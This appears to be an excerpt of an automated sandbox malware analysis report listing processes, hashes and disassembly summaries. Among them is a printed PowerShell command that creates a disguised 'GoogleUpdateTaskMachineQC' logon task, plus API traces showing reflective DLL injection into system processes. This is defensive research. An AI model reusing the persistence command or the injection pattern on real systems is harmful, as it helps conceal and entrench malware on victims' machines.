Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:24:42
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	18:24:43
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	18:24:43
Start date:	07/10/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff78a700000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	18:24:43
Start date:	07/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6eb350000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5944, Parent PID: 2744

General

Target ID:	28
Start time:	18:24:43
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	18:24:43
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	18:24:44
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	18:24:45
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	18:24:45
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	18:24:45
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	18:24:46
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	18:24:46
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	18:24:47
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	18:24:47
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	18:24:47
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	18:24:48
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	18:24:49
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	18:24:50
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	18:24:50
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	18:24:50
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	18:24:51
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	18:24:52
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	18:24:53
Start date:	07/10/2024
Path:	C:\Windows\System32\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\spoolsv.exe
Imagebase:	0x7ff630670000
File size:	842'752 bytes
MD5 hash:	0D4B1E3E4488E9BDC035F23E1F4FE22F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	18:24:53
Start date:	07/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
Imagebase:	0x7ff68dea0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF752A414B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1417263002.00007FF752A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF752A40000, based on PE: true

Associated: 00000000.00000002.1417188725.00007FF752A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1417315153.00007FF752A5B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1418832854.00007FF752FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1418994933.00007FF752FEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1419054510.00007FF752FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1419161633.00007FF752FFA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1419292507.00007FF752FFB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff752a40000_h2qWqtD73F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a59060b9db2a427f38197d6d8fc1317a4e77fd9c2963c7075b2de803b932c0
Instruction ID: 42dcef018eb2997d6a2475997241fe23b10728cbc6c6749d93db4b42f330cdb9
Opcode Fuzzy Hash: 01a59060b9db2a427f38197d6d8fc1317a4e77fd9c2963c7075b2de803b932c0
Instruction Fuzzy Hash: 4BB0922490420584E3003B45AC41298A260AB04780F944020C80C02392CAAE90418B70

Analysis Process: dialer.exePID: 8108, Parent PID: 2592COMMON

Execution Graph

Execution Coverage:	47.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	64.3%
Total number of Nodes:	230
Total number of Limit Nodes:	26

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF67E6C2328 Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 194
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67E6C2078: StrCpyW.SHLWAPI ref: 00007FF67E6C20AA
Part of subcall function 00007FF67E6C2078: StrCatW.SHLWAPI ref: 00007FF67E6C20B8
Part of subcall function 00007FF67E6C2078: GetModuleHandleW.KERNEL32 ref: 00007FF67E6C20C1
Part of subcall function 00007FF67E6C2078: GetCurrentProcess.KERNEL32 ref: 00007FF67E6C210C
Part of subcall function 00007FF67E6C2078: K32GetModuleInformation.KERNEL32 ref: 00007FF67E6C2120
Part of subcall function 00007FF67E6C2078: CreateFileW.KERNELBASE ref: 00007FF67E6C2150
Part of subcall function 00007FF67E6C2078: CreateFileMappingW.KERNELBASE ref: 00007FF67E6C217B
Part of subcall function 00007FF67E6C2078: MapViewOfFile.KERNELBASE ref: 00007FF67E6C219F
Part of subcall function 00007FF67E6C2078: lstrcmpiA.KERNEL32 ref: 00007FF67E6C21EA
Part of subcall function 00007FF67E6C2078: CloseHandle.KERNELBASE ref: 00007FF67E6C2258
Part of subcall function 00007FF67E6C2078: CloseHandle.KERNEL32 ref: 00007FF67E6C2261
Part of subcall function 00007FF67E6C2078: FreeLibrary.KERNEL32 ref: 00007FF67E6C226A

VerSetConditionMask.NTDLL ref: 00007FF67E6C2397
VerSetConditionMask.NTDLL ref: 00007FF67E6C23A8
VerSetConditionMask.NTDLL ref: 00007FF67E6C23B9
VerifyVersionInfoW.KERNEL32 ref: 00007FF67E6C23CC
GetCurrentProcessId.KERNEL32 ref: 00007FF67E6C23DE
OpenProcess.KERNEL32 ref: 00007FF67E6C23EE
OpenProcessToken.ADVAPI32 ref: 00007FF67E6C240F
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF67E6C2429
AdjustTokenPrivileges.KERNELBASE ref: 00007FF67E6C246D
GetLastError.KERNEL32 ref: 00007FF67E6C2477
CloseHandle.KERNELBASE ref: 00007FF67E6C2480
FindResourceExA.KERNEL32 ref: 00007FF67E6C2494
SizeofResource.KERNEL32 ref: 00007FF67E6C24AB
LoadResource.KERNEL32 ref: 00007FF67E6C24C4
LockResource.KERNEL32 ref: 00007FF67E6C24D6
GetCurrentProcessId.KERNEL32 ref: 00007FF67E6C24E3
RegCreateKeyExW.KERNELBASE ref: 00007FF67E6C2524
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF67E6C2557
RegSetKeySecurity.KERNELBASE ref: 00007FF67E6C2574
LocalFree.KERNEL32 ref: 00007FF67E6C2581
RegCreateKeyExW.KERNELBASE ref: 00007FF67E6C25B9
GetCurrentProcessId.KERNEL32 ref: 00007FF67E6C25C3
RegSetValueExW.KERNELBASE ref: 00007FF67E6C25F1
RegCloseKey.KERNELBASE ref: 00007FF67E6C25FC
RegCloseKey.ADVAPI32 ref: 00007FF67E6C2607
CreateThread.KERNELBASE ref: 00007FF67E6C2628
GetProcessHeap.KERNEL32 ref: 00007FF67E6C262E
HeapAlloc.KERNEL32 ref: 00007FF67E6C263D
CreateThread.KERNELBASE ref: 00007FF67E6C266C
CreateThread.KERNELBASE ref: 00007FF67E6C268D
SleepEx.KERNELBASE ref: 00007FF67E6C2695

Strings

kernel32.dll, xrefs: 00007FF67E6C23D2
pid, xrefs: 00007FF67E6C2596
DLL, xrefs: 00007FF67E6C2486
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00007FF67E6C2550
svc64, xrefs: 00007FF67E6C25CE
SeDebugPrivilege, xrefs: 00007FF67E6C2422
ntdll.dll, xrefs: 00007FF67E6C233B
SOFTWARE\dialerconfig, xrefs: 00007FF67E6C24FF

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 2439791646-1130149537
Opcode ID: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
Instruction ID: d588b291bba05f019bf18310c3870a470bb231d733935339c60d5eba6699a72b
Opcode Fuzzy Hash: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
Instruction Fuzzy Hash: D7A1EB37B69B8286EB209F21E8542AA73A1FB98754F404235E94D87B74DF3CE14DD700

Function 00007FF67E6C10C0 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 259
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67E6C19AC: OpenProcess.KERNEL32(?,?,?,00007FF67E6C110E), ref: 00007FF67E6C19CA
Part of subcall function 00007FF67E6C19AC: IsWow64Process.KERNEL32(?,?,?,00007FF67E6C110E), ref: 00007FF67E6C19E0
Part of subcall function 00007FF67E6C19AC: CloseHandle.KERNELBASE(?,?,?,00007FF67E6C110E), ref: 00007FF67E6C19FB

OpenProcess.KERNEL32 ref: 00007FF67E6C112C
OpenProcess.KERNEL32 ref: 00007FF67E6C114B
K32GetModuleFileNameExW.KERNEL32 ref: 00007FF67E6C1170
PathFindFileNameW.SHLWAPI ref: 00007FF67E6C117E
lstrlenW.KERNEL32 ref: 00007FF67E6C118A
StrCpyW.SHLWAPI ref: 00007FF67E6C11A1
CloseHandle.KERNEL32 ref: 00007FF67E6C11AD
StrCmpIW.SHLWAPI ref: 00007FF67E6C11ED
NtQueryInformationProcess.NTDLL ref: 00007FF67E6C1221
OpenProcessToken.ADVAPI32 ref: 00007FF67E6C124B
GetTokenInformation.KERNELBASE ref: 00007FF67E6C1277
GetLastError.KERNEL32 ref: 00007FF67E6C1281
LocalAlloc.KERNEL32 ref: 00007FF67E6C1294
GetTokenInformation.KERNELBASE ref: 00007FF67E6C12C0
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF67E6C12CD
GetSidSubAuthority.ADVAPI32 ref: 00007FF67E6C12DC
LocalFree.KERNEL32 ref: 00007FF67E6C12F4
CloseHandle.KERNEL32 ref: 00007FF67E6C1308
StrStrA.SHLWAPI ref: 00007FF67E6C13B2
VirtualAllocEx.KERNELBASE ref: 00007FF67E6C1419
WriteProcessMemory.KERNELBASE ref: 00007FF67E6C143C
WaitForSingleObject.KERNEL32 ref: 00007FF67E6C1488
GetExitCodeThread.KERNEL32 ref: 00007FF67E6C149E
CloseHandle.KERNELBASE ref: 00007FF67E6C14B6
CloseHandle.KERNEL32 ref: 00007FF67E6C14BF

Strings

MSBuild.exe, xrefs: 00007FF67E6C11B8
dialer.exe, xrefs: 00007FF67E6C11D8
WmiPrvSE.exe, xrefs: 00007FF67E6C11CC
@, xrefs: 00007FF67E6C140C
ReflectiveDllMain, xrefs: 00007FF67E6C13A8

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
API String ID: 2561231171-2835194517
Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction ID: fe5e2650a922e03053a58b6ee9fe528b941c4256cf5603b33cbd0bdd81d271d7
Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction Fuzzy Hash: 63B13E77B28A4286EF209F11A8546BA37A5FF64B84F004235EA4E87764DF3CF549E740

Function 00007FF67E6C14E4 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF67E6C1517
HeapAlloc.KERNEL32 ref: 00007FF67E6C152A
GetProcessHeap.KERNEL32 ref: 00007FF67E6C1538
HeapAlloc.KERNEL32 ref: 00007FF67E6C1549
K32EnumProcesses.KERNEL32 ref: 00007FF67E6C1563
OpenProcess.KERNEL32 ref: 00007FF67E6C1591
K32EnumProcessModules.KERNEL32 ref: 00007FF67E6C15B6
ReadProcessMemory.KERNELBASE ref: 00007FF67E6C15ED
CloseHandle.KERNELBASE ref: 00007FF67E6C1629
GetProcessHeap.KERNEL32 ref: 00007FF67E6C163B
HeapFree.KERNEL32 ref: 00007FF67E6C1649
GetProcessHeap.KERNEL32 ref: 00007FF67E6C164F
HeapFree.KERNEL32 ref: 00007FF67E6C165D

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction ID: 0f77232f7ec49973beb31a3ec46086c3c8236b4e604b77b7c1396d6c1833097e
Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction Fuzzy Hash: 5451B373B256828AEF60CF62D8586AA32A0FB59B84F444135EE4D87764DF3CE44AD700

Function 00007FF67E6C1C64 Relevance: 9.1, APIs: 6, Instructions: 88
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF67E6C1CB3
SetEntriesInAclW.ADVAPI32 ref: 00007FF67E6C1D14
LocalAlloc.KERNEL32 ref: 00007FF67E6C1D24
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF67E6C1D3A
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF67E6C1D52
CreateNamedPipeW.KERNELBASE ref: 00007FF67E6C1D94

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction ID: 77e74b91c01525272856f4cc0d831f460e31e41d69628a5636d380eeea35235e
Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction Fuzzy Hash: FC412C73724A518ADB50CF24E4507AA37B4FB54758F40122AFA4D87BA8DF7CE548DB40

Function 00007FF67E6C2078 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 00007FF67E6C20AA
StrCatW.SHLWAPI ref: 00007FF67E6C20B8
GetModuleHandleW.KERNEL32 ref: 00007FF67E6C20C1
GetCurrentProcess.KERNEL32 ref: 00007FF67E6C210C
K32GetModuleInformation.KERNEL32 ref: 00007FF67E6C2120
CreateFileW.KERNELBASE ref: 00007FF67E6C2150
CreateFileMappingW.KERNELBASE ref: 00007FF67E6C217B
MapViewOfFile.KERNELBASE ref: 00007FF67E6C219F
lstrcmpiA.KERNEL32 ref: 00007FF67E6C21EA
VirtualProtect.KERNELBASE ref: 00007FF67E6C2221
VirtualProtect.KERNELBASE ref: 00007FF67E6C224F
CloseHandle.KERNELBASE ref: 00007FF67E6C2258
CloseHandle.KERNEL32 ref: 00007FF67E6C2261
FreeLibrary.KERNEL32 ref: 00007FF67E6C226A

Strings

.text, xrefs: 00007FF67E6C21E3
C:\Windows\System32\, xrefs: 00007FF67E6C209B

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction ID: 67bc63a508af46db78022d3b449489da2505a4b83f5730346319b859515be5a8
Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction Fuzzy Hash: D6514D37718A4286EF619B11F8586AB7365FB99B98F044231EE4D43BA4DE3CE40DD700

Function 00007FF67E6C2D84 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67E6C1C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF67E6C1CB3
Part of subcall function 00007FF67E6C1C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF67E6C1D14
Part of subcall function 00007FF67E6C1C64: LocalAlloc.KERNEL32 ref: 00007FF67E6C1D24
Part of subcall function 00007FF67E6C1C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF67E6C1D3A
Part of subcall function 00007FF67E6C1C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF67E6C1D52
Part of subcall function 00007FF67E6C1C64: CreateNamedPipeW.KERNELBASE ref: 00007FF67E6C1D94

Sleep.KERNEL32 ref: 00007FF67E6C2DA9
ConnectNamedPipe.KERNELBASE ref: 00007FF67E6C2DB6
ReadFile.KERNELBASE ref: 00007FF67E6C2DD9
